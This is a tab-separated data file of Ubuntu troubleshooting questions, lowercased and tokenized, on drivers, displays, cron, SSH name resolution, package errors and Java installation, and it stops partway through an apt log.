149480	ati ( fglrx ) dual monitor / laptop hot-plugging	i been running ubuntu 12.04 since alpha with the ati open source drivers and with gnome-shell . i been generally very happy with them with only small issues along the way . now of course it does not support 3d acceleration 100 % , so games amnesia would not play . the ati driver is in the repos . how i use my computer : it 's laptop , with a hd 3670 card in it . i spend about 50 % of the time working directly on the laptop ( at home ) and about 50 % of the time working with an additional display connected ( at work ) , multi desktop environment . what happening now : installed drivers things seemed to working , save some small other bugs ( not critical ) this morning i take my machine and plug the additional monitor into it , and nothing happens ... ok fine . open `` displays '' try configure dual display , wo n't work open ati config `` thing '' ( cause it is a thing , a crap thing ) and set-up monitors there reboot it says ( oh ffs , really ... . ok ) reboot , login and wow , i got a gnome 2 desktop ( presume gnome 3 fall back ) and no multi-monitor ... great . ( screenshot : http : //ubuntuone.com/5tfe3qnfstsigvusvlsyl7 ) after getting into a situation where i had to ctrl + alt + del to get out of a frozen display , i eventually manage to set-up a single display desktop on the `` main '' monitor ok.. time to go home ... unplug monitor ... nothing happens.. oh boy here we go ... try displays again , nothing , just hangs the display.. great . crash all the apps and reboot ... so it 's been a trying day ... please help with a solution that : allows me run fglrx ( so i can run the games i want ) allows me to hot-plug a monitor to my laptop and remove it again allows me to change the display so include the hot-plugged monitor ( preferable automatically like it did with the open drivers ) next best if that 's not possible : switch between laptop only display and monitor only display easily ( not having to reboot , logout , suspened , etc ... )
149483	configuring wireless networking in 11.04	how do i setup wireless connection in my ubuntu 11.04 ? how to configure the connection ? how to get the details like ssid and all that ...
149487	why does cron.hourly not care about the existence of anacron ?	this question came up over in root access . why does the default /etc/crontab not check for existence ( and executable flag ) of /usr/sbin/anacron for the hourly entry ? my /etc/crontab : # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) what makes hourly different from the others ?
149490	what is the story behind the default times set in /etc/crontab ?	to my understanding , this is the default configuration of /etc/crontab : # m h dom mon dow user command 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) why were these specific times chosen for the default entries ? at first i assumed that they are somewhat randomized on installation to even out the system load , but that does n't seem to be correct .
149491	how to `` lock '' d : to my launcher ?	how to `` lock '' d : to my launcher ? i am not getting option in right-click menu to lock it over launcher . please help .
149496	difference in fans on windows 7 and ubuntu 12.04	i have bought a hp pavilion dv7 with core i7 cpu and installed ubuntu 12.04 on dual boot with windows 7 alongside . apart from the difference in battery life ( although that 's fixed with jupiter ) , i have another problem with the fans . on windows my fans work perfectly and the laptop is cool , but it seems to overheat in ubuntu . it becomes quite hot and it looks like my fans are not working under ubuntu . i think i 'm having the same problem as how can i keep the cpu temp low ? , but since i can not comment because of the lack of reputation ( ? ) , i post the question as a new thread . i think the result of the overheating is that my keyboard does n't seem to follow when i start typing a long text . it just freezes and types the last letter multiple times . for example : when i type the word freezes , it shows freeeee so the zes changed into eee ...
149499	skype notifications are muted	i can hear skype calls just fine , but notifications seem to be muted . i 've gone into my sound settings and whenever a notification appears , a `` skype '' appears under `` applications , '' and it is muted . pressing `` mute '' does n't do anything , and whenever i slide the volume up , it snaps back to 0 % . i do n't seen anything that could be causing it in my .skype folder . any ideas ?
149500	why is the kernel module cfg80211 also listed as a kernel process [ cfg80211 ] ?	i do not understand why the kernel module cfg80211 is also listed by ps aux as shown below : $ ps aux | grep cfg80211 root 521 0.0 0.0 0 0 ? s < 16:09 0:00 [ cfg80211 ]
149504	how can i tell if my hourly cron job has run ?	i have created a file called ntpdate in /etc/cron.hourly # ! /bin/sh /usr/sbin/ntpdate-debian date > /tmp/william_tmp date > /william_tmp date > ~/william_tmp echo test i also did chmod 755 to this file . however , i ca n't tell if the file has run or not ! the file is not created in any of the 3 directories . if i manually run cd / & & run-parts -- report /etc/cron.hourly then the files are created and i get the echo . can anyone recommend ( ideally step by step ! ) instructions to test that it is working ?
149509	apt-get command error not letting ubuntu update	every time i run sudo apt-get update i get an error : w : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/limbo/ubuntu/dists/precise/main/binary-i386/packages the requested url returned error : 401 this url is not in my sources list nor do i know what i need from it , but ubuntu 's not updating without it . what can i do to fix it ?
149514	disable ethernet permanently to speed up boot time	i do not use the wired ethernet card . it seems to me that , ubuntu is always trying in boot time to check the network via eth0 , which consumes some times and i guess this may slow down the boot process a bit . my dmesg output is below ( partial ) 2012-06-11 23:06:47 ubuntu-kde kernel [ 1.985592 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:01/input/input5 2012-06-11 23:06:47 ubuntu-kde kernel [ 1.985651 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) 2012-06-11 23:06:47 ubuntu-kde kernel [ 1.985693 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 2012-06-11 23:06:47 ubuntu-kde kernel [ 2.056261 ] firewire_core : created device fw0 : guid 00023f87af41fd7d , s400 2012-06-11 23:06:47 ubuntu-kde kernel [ 3.710435 ] ext4-fs ( sda9 ) : mounted filesystem with ordered data mode . opts : ( null ) a big time here ... .. 2012-06-11 23:06:47 ubuntu-kde kernel [ 13.466642 ] addrconf ( netdev_up ) : eth0 : link is not ready 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.125296 ] adding 1050620k swap on /dev/sda6 . priority : -1 extents:1 across:1050620k 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.226952 ] ext4-fs ( sda9 ) : re-mounted . opts : ( null ) 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.335012 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.335091 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.335128 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.346410 ] input : ideapad extra buttons as /devices/platform/ideapad/input/input6 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.428551 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.436958 ] cfg80211 : calling crda to update world regulatory domain 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.476550 ] linux video capture interface : v2.00 2012-06-11 23:06:47 ubuntu-kde kernel [ 14.486385 ] uvcvideo : found uvc 1.00 device usb 2.0 camera ( 04f2 : b008 ) so , my question is how can i disable the ethernet card completely , so that kernel will not try to use that ?
149515	will removing xubuntu packages affect unity ?	thanks to the answers at how to remove xubuntu-desktop ? , i know how to remove the xubuntu desktop . but i am concerned that removing xubuntu from my ubuntu install might affect or harm the unity desktop environment . is this concern of mine valid ?
149520	how do i download a corrupted package again ?	ubuntu 12.04 ca n't install firefox 13 update , because the package is corrupted . while attempting to install , returns this error ( i translated it from my language to english ) . /var/cache/apt/archives/firefox_13.0+build1-0ubuntu0.12.04.1_i386.deb w : waited for dpkg -- assert-multi-arch but was not there - dpkggo ( 10 : there are no `` child '' processes ) . i can tell that the package at /var/cache/apt/archives/firefox_13.0+build1-0ubuntu0.12.04.1_i386.deb is corrupted , but even as admin , i ca n't delete it in order to be downloaded again . how should i proceed ? edit : there was a single package causing this conflict , please report here to understand all the situation : why ca n't i install from software center ?
149522	how to reset top panel on ubuntu 12.04 to upgrade standard ( classic view ) ?	first off let me say a huge thanks to all of you here . i have used your forums frequently with past upgrades ( i am on my 4th ) . i recently upgraded to 12.04 . the upgrade went perfectly . the smoothest ever and it even kept the classic view that i like best . the only issue that was bugging me was the lack of a volume control icon on the top panel . i thought i found a way to change that using windows button-alt -right click , add indicator applet . but my novice fingers ended up placing that applet on my top bar 3 times . in a series of attempts to fix what i did i ended up removing , adding to , then deleting the entire panel . ( i am not ready to give up ubuntu but sometimes wonder why i even try to mess with it . ) anyway , here are my two big needs : 1 ) i really want my top panel to be where it was when i upgraded it . right now i have the indicator applet on the right and nothing on the left . it was those left side menu bars that i used the most . can i undo or redo this ? 2 ) currently , because i do not have those menus on the left side i do not have my mozilla firefox icon to get online . i just ran the update manager , hoping it would magically fix it , and one of the things listed was the installation of firefox but ... . i at this time can not figure out how to open up a browser . this means that any help online that needs me to copy/paste into terminal i can not do . i have my netbook next to another computer at them moment but not knowing much about terminal , i have not had success retyping terminal commands successfully into the terminal on the netbook i am trying to fix . are there keystrokes to pull something up that will help me run mozilla ? ( and please forgive me if i am using the wrong wording and terminology ) i think i need internet access first and then will happily do whatever you all tell me to do to get my classic panel back again . can anyone help me ? please ! : )
149523	system drivers on ubuntu 12.04	i want to ask a question i am a new user to ubuntu and i am going to install it on my pc and remove windows as i have read a lot about ubuntu and how it 's solid based system and that it 's more stable and stronger but to be honest i am a bit afraid of installing it as i do n't have the drivers cd so does ubuntu need drivers or not ? and how do i check that all the drivers are installed and updated and work correctly ? and if i want to install a driver will ubuntu help me to search for it and install it ? and will ubuntu install the sound card . the internet card and the graphics etc . automatically or not waiting for your replies cheers : )
149524	no 1080p @ 60hz option with nvidia card	i am having a strange problem with screen resolution my gpu is a geforce 310 512mb hdmi . my tv is 1080p defenaitly and has v refresh @ 60hz this works fine on my xbox and on windows 7 . the nvidia control panel at first would not do 1080p only when i disabled `` force full gpu scaleing '' . now if i lower the refresh rate to 50hz i get 1080p but when i put it to 60hz it returns to 1080i some one help me plese this is driveing me nuts i really dont want to have to use windows again
149528	java does n't work with legislative elections application	it is possible for french citizens living abroad to vote by the internet in this weekend 's legislative elections ( elections législatives ) . the process begins at this website . among the supported operating systems are ubuntu linux as indicated here . when i go to vote it tells me java is not working , ( java : non installé ou la version détectée n'est pas à jour . votre configuration ne satisfait pas les conditions requises pour pouvoir voter en toute sécurité par internet ) even though my java is up to date .
149530	how to share two keyboard on the same laptop , french iso layout and usa ansi layout keyboard with usb ?	i recently buy a `` noppoo choc mini '' with this specific ansi us-international pc84 layout . this specific keyboard have only 84 key , a 60 % ( compact tenkeyless ) reduced layout my problem is simple , there is no keyboard layout into ubuntu 12.04 which correspond to this usa normal ansi layout ... so it 's the same problem with reduced version and only 84 key .. i search a template of normal ansi us-international for xmodmap/xkb , and after i can try to manually map the other key . i search on google , and i do n't find any other user which have same problem , so it 's seem i have not the good keywoard to search this information.. edit 1 : here you can see there is probably a bug in ubuntu , because the layout for usa with dead key is not correct ! i have this : and other users have this for the same layout : edit 2 it seems after a `` sudo dpkg-reconfigure keyboard-configuration '' : french standard keyboard pc105 + precision m65 keyboard from dell laptop now i can see the good us layout in parameters , but i can not have the iso layout for french usage ... edit 3 ok , after reboot i understand the problem , i explain . i have one laptop with integrated french keyboard , and i want to use my usb keyboard which use a usa ansi layout . it seem it 's impossible in ubuntu and `` dpkg-reconfigure keyboard-configuration '' to share two different physical layout ( ansi and eu iso ) on the same computer ... edit4 ok , it seems i can switch the physical layout ( iso < - > ansi ) with this command in terminal : setxkbmap -layout us setxkbmap -layout us -variant alt-intl an setxkbmap -layout fr it 's very complicated qnd it seem ubuntu 12.04 have big problem with keyboard manager ... because all works great with these two commands , without any change into the system parameters > keyboard ! ! ! second bug ? the image of the layout for fr is buggy , the layout is not iso , but i can press on the letter `` < > '' at the left of right shift without any problem ! you can see the image here ( french alternative with ansi layout ? it 's crazy ? ) : can you help me on this point ? i 'm lost with xkb , and manual mapping is very complicated ... thanks a lot , sr
149534	why get ubuntu one music cloud over regular free ubuntu one ?	using the ubuntu one files application i can download the mp3 files i bought in the music store and play them on my android phone . so besides the added 15gb storage , what are the advantages of the paid music cloud service ( and app ) ?
149535	how can i check my filesystem with the new disks 3.4.1 ?	disks 3.4.1 ( aka palimpsest , gnome-disk-utility , or disk utility ) underwent a huge ui change , and i ca n't find something comparable to the old `` check filesystem '' button in its ui . where can i find this ?
149540	host is able to resolve a hostname , ssh is n't	i 'm trying to connect from a 10.04 system to a 12.04 system via ssh . strangely enough the rules in resolv.conf seem to take effect only selectively , which leaves me puzzled . observe : [ 2 ] user @ mach : ~ $ ssh pangolin ssh : could not resolve hostname pangolin : name or service not known [ 2 ] user @ mach : ~ $ host pangolin pangolin.subdomain.domain.tld has address 172.16.7.12 subdomain.domain.tld is on the search line in /etc/resolv.conf and using host the name is properly searched given those rules . however , with the ssh client ssh i receive the error reproduced above . how can this be ? i was always of the impression that the name resolution rules in resolv.conf apply system-global . note : /etc/hosts does n't declare the name pangolin at all . the package openssh-server is configured on the target machine . the question is purely about why name resolution is n't consistent between those two programs . another note : the command works fine when i enter the fully-qualified domain name , i.e . pangolin.subdomain.domain.tld . meanwhile i rebooted the client machine ( 10.04 ) and the problem still exists . a dns caching daemon is n't installed , so i reckon that should n't have been a problem anyway . the information asked for in the comment : $ grep host /etc/nsswitch.conf hosts : files dns /etc/resolv.conf , i transformed the domain names consistently : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 172.16.1.1 nameserver 172.16.1.5 search subdomain.domain1.com domain1.com domain2 domain3.com domain2.cctld domain3.net dev.domain1.com sdk.dev.domain1.com ... and the full /etc/nsswitch.conf : $ cat /etc/nsswitch.conf # /etc/nsswitch.conf # # example configuration of gnu name service switch functionality . # if you have the `glibc-doc-reference ' and `info ' packages installed , try : # `info libc `` name service switch '' ' for information about this file . passwd : compat group : compat shadow : compat hosts : files dns networks : files protocols : db files services : db files ethers : db files rpc : db files netgroup : nis ... and /etc/network/interfaces , which is the source for resolv.conf in 12.04 : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 172.16.1.234 netmask 255.255.0.0 gateway 172.16.255.254 dns-nameservers 172.16.1.1 172.16.1.5 dns-search domain1.com . domain2 . domain3.com . domain2.cctld . domain3.net . dev.domain1.com . sdk.dev.domain1.com . subdomain.domain1.com . dns-domain subdomain.domain1.com . note : the transformation of the domain names was done with sed , so it 's consistent between the various reproduced files . there is no ~/.ssh/config , but here 's the global one ( /etc/ssh/ssh_config ) , shrunk for the sake of brevity : $ grep -v '^ # ' /etc/ssh/ssh_config |grep -v '^ [ [ : space : ] ] * $ ' host * sendenv lang lc_* hashknownhosts yes gssapiauthentication yes gssapidelegatecredentials no $ mtr pangolin name or service not known : success
149545	linux header files referenced by mac80211 missing	i am using kernel 3.2.0-24-generic . i need to modify source files of ath9k and mac80211 . one of the files in mac80211 refers to a few linux header files such as linux/slab.h , linux/skbuff.h , linux/etherdevice.h , linux/if_arp.h and so on . i have installed the latest headers but still these are missing . where can i download these header files ?
149547	how do i fix a blank desktop after logging into regular ubuntu ( unity ) ?	ever since i downloaded ubuntu 12.04 my computer basically has been really screwed up . loading up ubuntu in regular mode has a blank screen with my background and that 's it , and so i 'm in 2d mode .
149549	can i move the workspace switcher icon to the top of the unity launcher	i would like to move the workspace switcher icon from the bottom to the top of my unity dock bar . is this possible ? drag and drop does not work . thanks !
149550	how do i gracefully shutdown a juju charm ?	my charm controls a service that can detect when it 's no longer needed , and should shut itself down . is there a defined way to shutdown the system in a way that juju considers appropriate ? can i just shutdown -h now on the system ?
149553	how do i make a juju charm 's revision match the bazaar revision of its repo ?	i 've got a juju charm that is stored in a bazaar repository and i would like the charm revision file to have the same value as the bazaar repository 's revision number . is there a way to make juju `` compile '' the charm and check bazaar for the revision number ? basically i want bzr revno > revision .
149558	i ca n't view my laptop on tv	i have a compaq c770 with an intel graphic chipset . i 'm running ubuntu 12.04 . i plug the tv through a s-video port . however , nothing appears on the tv . ubuntu detects the tv , and i can configure it . however , the tv is still black . when i write xrandr -- verbose it shows this : tv1 connected 1024x768+1280+0 ( 0x4b ) normal ( normal left inverted right x axis y axis ) 0mm x 0mm identifier : 0x43 timestamp : 1262326 subpixel : unknown gamma : 1.0:1.0:1.0 brightness : 1.0 clones : crtc : 1 crtcs : 1 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : bottom margin : 37 ( 0x00000025 ) range : ( 0,100 ) right margin : 46 ( 0x0000002e ) range : ( 0,100 ) top margin : 36 ( 0x00000024 ) range : ( 0,100 ) left margin : 54 ( 0x00000036 ) range : ( 0,100 ) mode : ntsc-m supported : ntsc-m ntsc-443 ntsc-j pal-m pal-n pal 480p @ 59.94hz 480p @ 60hz 576p 720p @ 60hz 720p @ 59.94hz 720p @ 50hz 1080i @ 50hz 1080i @ 60hz 1080i @ 59.94h 848x480 ( 0x49 ) 29.0mhz +preferred h : width 848 start 849 end 912 total 944 skew 0 clock 30.7khz v : height 480 start 481 end 512 total 513 clock 59.9hz 640x480 ( 0x4a ) 22.6mhz +preferred h : width 640 start 641 end 704 total 736 skew 0 clock 30.7khz v : height 480 start 481 end 512 total 513 clock 59.9hz 1024x768 ( 0x4b ) 53.8mhz *current h : width 1024 start 1025 end 1088 total 1120 skew 0 clock 48.0khz v : height 768 start 769 end 800 total 801 clock 59.9hz 800x600 ( 0x4c ) 34.0mhz h : width 800 start 801 end 864 total 896 skew 0 clock 37.9khz v : height 600 start 601 end 632 total 633 clock 59.9hz i really do n't know what is wrong .
149562	how to upgrade to emacs 24.1 ?	emacs 24.1 was released recently , and i 'm wondering what the recommended way of upgrading precise 's emacs to it is . i know of the snapshot ppa , but i 'd like the final , stable version . i 've found a suggestion to install it manually , but i 'd like to use apt if at all possible .
149573	why does skype possibly cause my xubuntu 12.04 to freeze ?	my xubuntu 12.04 desktop sometimes just freezes becoming completely unresponsive . i have to hard-reset my computer . i think that this somehow can be related to skype , because when i start skype for the first time after boot my desktop sometimes freezes for about 5 secs and then skype terminates ( without any messages ) , then i launch skype again and it starts ok this time . p/s : i update my box regularly . how can one application compromise the whole system ? ( i though linux was different ) . i do n't know what information can be helpful to diagnose the problem , but i will be glad to provide it on first request . skype version string : skype ( tm ) ( beta ) 2.2.0.35 please advise )
149576	auto_raise broken in gnome 3.4.1 ?	since dist-upgrading 12.04 lts in such a manner as resulted in an upgrade of gnome from 3.2.x to 3.4.1 , auto_raise is broken . i have the usual auto_raise* settings set in gconf , in apps - > metacity - > general . but the functionality just does n't work anymore . focus follows mouse works fine , yes , but windows just no longer raise after a short delay . i have tried both gconf and tweak tool-based remedies , to no avail . any ideas on how to work around this ? auto-raise is a really integral part of my workflow .
149581	ubuntu 11.10 completely freezes	hello all . my ubuntu 11.10 installation seems to suddenly lock up . i can not move my mouse or use the keyboard , all screen activity stops , and i have to do a hard reboot . is there an y method to repair this ? it started a few days ago .
149582	sager np6165 ( realtek ) wireless not working	hello i 'm having issues with my new laptop ( sager np6165 ) getting wireless . i 've been searching for a solution , to no avail . my network card , integrated 802.11 b/g/n wireless lan half mini card module + bluetooth sudo lshw -c network *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport : d000 ( size=256 ) memory : f7900000-f7903fff lspci 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) thanks in advance .
149589	krusader does n't save ftp password	i need to type the ftp password always , although i have checked the remember password option . what could be wrong ? ?
149592	help hibernate ubuntu 12.04	i 've add this following code to /etc/polkit-1/localauthority/50-local.d/com.ubuntu.desktop.pkla [ enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes when i choose to hibernate , the pc does n't shutdown but i can see the text in the image in the link ... help me please..i need to hibernate my computer.. thanks
149596	why ca n't i install from software center ?	there was a problem upgrading to firefox 13 . this error kept returning : /var/cache/apt/archives/firefox_13.0+build1-0ubuntu0.12.04.1_i386.deb w : waited for dpkg -- assert-multi-arch but was not there - dpkggo ( 10 : there are no `` child '' processes ) . now it seems that there is some problem with dpkg and i ca n't install anything from software center . i already tried to clean previous packages with sudo rm /var/lib/apt/lists/* -vf and then sudo apt-get update , it did n't work . when running sudo dpkg -- configure -a , i get this : dpkg : problems with dependencies prevent the configuration of firefox-globalmenu : firefox-globalmenu depends on firefox ( = 13.0+build1-0ubuntu0.12.04.1 ) ; however : the package is not installed . dpkg : error while processing firefox-globalmenu ( -- configure ) : problems com dependencies - leaving unconfigured there has been found errors while processing : firefox-globalmenu what should i do to fix this ? ? edit : i do n't have the necessary expertise to understand why what i did worked and what was causing the conflict , but anyway , since there was a problem with firefox-globalmenu : , i went to synaptics package manager , i removed this particular package and reinstalled it . after that , i was able to install firefox from synaptics and also any other applications from software center . however , still there was a problem , when running sudo apt-get update , the following kept returning : failed to get gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages verification code hash does n't match . e : some archives index failed at being downloaded . they have been ignored , or older copies are used instead . so i typed sudo rm /var/lib/apt/lists/* -vf in terminal and then again sudo apt-get update and everything is fine now . i did this before an answer was posted , anyway i agree the problem was that particular package and its removal . so i 'll mark the below answer as accepted .
149597	java installation problem	i can not install java on my ubuntu 12.04 : zero @ ghostrider : ~ $ sudo apt-get purge openjdk* [ sudo ] password for zero : reading package lists ... done building dependency tree reading state information ... done note , selecting 'openjdk-6-demo ' for regex 'openjdk*' note , selecting 'openjdk-7-jre-headless ' for regex 'openjdk*' note , selecting 'uwsgi-plugin-jwsgi-openjdk-6 ' for regex 'openjdk*' note , selecting 'openjdk-jre ' for regex 'openjdk*' note , selecting 'openjdk-7-source ' for regex 'openjdk*' note , selecting 'openjdk-6-dbg ' for regex 'openjdk*' note , selecting 'openjdk7-jdk ' for regex 'openjdk*' note , selecting 'openjdk-6-doc ' for regex 'openjdk*' note , selecting 'openjdk-7-jre-zero ' for regex 'openjdk*' note , selecting 'openjdk-7-demo ' for regex 'openjdk*' note , selecting 'openjdk-6-jre-headless ' for regex 'openjdk*' note , selecting 'openjdk-6-jdk ' for regex 'openjdk*' note , selecting 'openjdk-6-jre ' for regex 'openjdk*' note , selecting 'openjdk-6-jre-lib ' for regex 'openjdk*' note , selecting 'openjdk-6-jre-zero ' for regex 'openjdk*' note , selecting 'openjdk-7-dbg ' for regex 'openjdk*' note , selecting 'openjdk-7-doc ' for regex 'openjdk*' note , selecting 'openjdk-7-jdk ' for regex 'openjdk*' note , selecting 'openjdk-7-jre ' for regex 'openjdk*' note , selecting 'openjdk-6-source ' for regex 'openjdk*' note , selecting 'openjdk-7-jre-lib ' for regex 'openjdk*' note , selecting 'uwsgi-plugin-jvm-openjdk-6 ' for regex 'openjdk*' package uwsgi-plugin-jvm-openjdk-6 is not installed , so not removed package uwsgi-plugin-jwsgi-openjdk-6 is not installed , so not removed package openjdk-6-dbg is not installed , so not removed package openjdk-6-demo is not installed , so not removed package openjdk-6-doc is not installed , so not removed package openjdk-6-jdk is not installed , so not removed package openjdk-6-jre is not installed , so not removed package openjdk-6-jre-headless is not installed , so not removed package openjdk-6-jre-lib is not installed , so not removed package openjdk-6-source is not installed , so not removed package openjdk-6-jre-zero is not installed , so not removed package openjdk-7-dbg is not installed , so not removed package openjdk-7-demo is not installed , so not removed package openjdk-7-doc is not installed , so not removed package openjdk-7-jdk is not installed , so not removed package openjdk-7-jre is not installed , so not removed package openjdk-7-jre-headless is not installed , so not removed package openjdk-7-jre-lib is not installed , so not removed package openjdk-7-jre-zero is not installed , so not removed package openjdk-7-source is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-06-11 23:56:42 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk- 7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 64.209.77.18 connecting to download.oracle.com ( download.oracle.com ) |64.209.77.18|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-06-11 23:56:42 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 95.101.122.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |95.101.122.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-06-11 23:56:44 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |64.209.77.18|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % 1007k=0.005s 2012-06-11 23:56:44 ( 1007 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) zero @ ghostrider : ~ $ sudo add-apt-repository ppa : eugenesan/java you are about to add the following ppa to your system : more info : https : //launchpad.net/~eugenesan/+archive/java press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret- keyring /tmp/tmp.ugczhfsonf -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 4346fbb158f4022c896164eee61380b28313a596 gpg : requesting key 8313a596 from hkp server keyserver.ubuntu.com gpg : key 8313a596 : `` launchpad synergy+ '' not changed gpg : total number processed : 1 gpg : unchanged : 1 zero @ ghostrider : ~ $ sudo apt-get update ign http : //tr.archive.ubuntu.com precise inrelease ign http : //tr.archive.ubuntu.com precise-updates inrelease ign http : //tr.archive.ubuntu.com precise-backports inrelease hit http : //tr.archive.ubuntu.com precise release.gpg hit http : //tr.archive.ubuntu.com precise-updates release.gpg hit http : //tr.archive.ubuntu.com precise-backports release.gpg hit http : //tr.archive.ubuntu.com precise release ign http : //extras.ubuntu.com precise inrelease ign http : //security.ubuntu.com precise-security inrelease hit http : //tr.archive.ubuntu.com precise-updates release ign http : //ppa.launchpad.net precise inrelease hit http : //tr.archive.ubuntu.com precise-backports release hit http : //tr.archive.ubuntu.com precise/main sources hit http : //tr.archive.ubuntu.com precise/restricted sources hit http : //tr.archive.ubuntu.com precise/universe sources hit http : //tr.archive.ubuntu.com precise/multiverse sources hit http : //tr.archive.ubuntu.com precise/main i386 packages hit http : //tr.archive.ubuntu.com precise/restricted i386 packages hit http : //tr.archive.ubuntu.com precise/universe i386 packages hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //security.ubuntu.com precise-security release.gpg hit http : //tr.archive.ubuntu.com precise/multiverse i386 packages hit http : //tr.archive.ubuntu.com precise/main translationindex hit http : //tr.archive.ubuntu.com precise/multiverse translationindex hit http : //tr.archive.ubuntu.com precise/restricted translationindex hit http : //tr.archive.ubuntu.com precise/universe translationindex hit http : //tr.archive.ubuntu.com precise-updates/main sources hit http : //tr.archive.ubuntu.com precise-updates/restricted sources hit http : //tr.archive.ubuntu.com precise-updates/universe sources hit http : //tr.archive.ubuntu.com precise-updates/multiverse sources hit http : //tr.archive.ubuntu.com precise-updates/main i386 packages hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release hit http : //security.ubuntu.com precise-security release hit http : //tr.archive.ubuntu.com precise-updates/restricted i386 packages hit http : //tr.archive.ubuntu.com precise-updates/universe i386 packages hit http : //tr.archive.ubuntu.com precise-updates/multiverse i386 packages hit http : //tr.archive.ubuntu.com precise-updates/main translationindex hit http : //tr.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //tr.archive.ubuntu.com precise-updates/restricted translationindex hit http : //tr.archive.ubuntu.com precise-updates/universe translationindex hit http : //tr.archive.ubuntu.com precise-backports/main sources hit http : //tr.archive.ubuntu.com precise-backports/restricted sources hit http : //tr.archive.ubuntu.com precise-backports/universe sources hit http : //tr.archive.ubuntu.com precise-backports/multiverse sources hit http : //tr.archive.ubuntu.com precise-backports/main i386 packages hit http : //tr.archive.ubuntu.com precise-backports/restricted i386 packages hit http : //tr.archive.ubuntu.com precise-backports/universe i386 packages hit http : //tr.archive.ubuntu.com precise-backports/multiverse i386 packages hit http : //tr.archive.ubuntu.com precise-backports/main translationindex hit http : //extras.ubuntu.com precise/main sources hit http : //ppa.launchpad.net precise/main sources hit http : //security.ubuntu.com precise-security/main sources hit http : //tr.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //tr.archive.ubuntu.com precise-backports/restricted translationindex hit http : //tr.archive.ubuntu.com precise-backports/universe translationindex hit http : //tr.archive.ubuntu.com precise/main translation-en hit http : //tr.archive.ubuntu.com precise/multiverse translation-en hit http : //extras.ubuntu.com precise/main i386 packages ign http : 